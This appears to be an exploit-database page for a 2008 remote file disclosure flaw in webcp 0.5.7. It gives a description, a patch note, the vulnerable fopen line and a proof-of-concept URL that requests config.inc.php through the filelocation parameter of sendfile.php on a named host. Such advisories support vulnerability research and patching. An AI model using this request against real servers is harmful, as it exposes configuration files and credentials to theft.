header-logo
Suggest Exploit
vendor:
webcp
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Disclosure
434
CWE
Product Name: webcp
Affected Version From: 2000.5.7
Affected Version To: 2000.5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:web-cp:webcp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability

webcp 0.5.7 is vulnerable to a remote file disclosure vulnerability due to insufficient validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to view the contents of arbitrary files on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

##################################################################################
## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
## Demo : http://gyrbo.madoka.be/web-cp/
## Vuln :
## }
## if ($tf = fopen($filelocation, "r")) {
## // Date in the past
##################################################################################
## POC :
##      http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
## Open By Mozilla Firefox
##################################################################################

# milw0rm.com [2008-09-24]

Navigation

Suggest Exploit

Services By CQR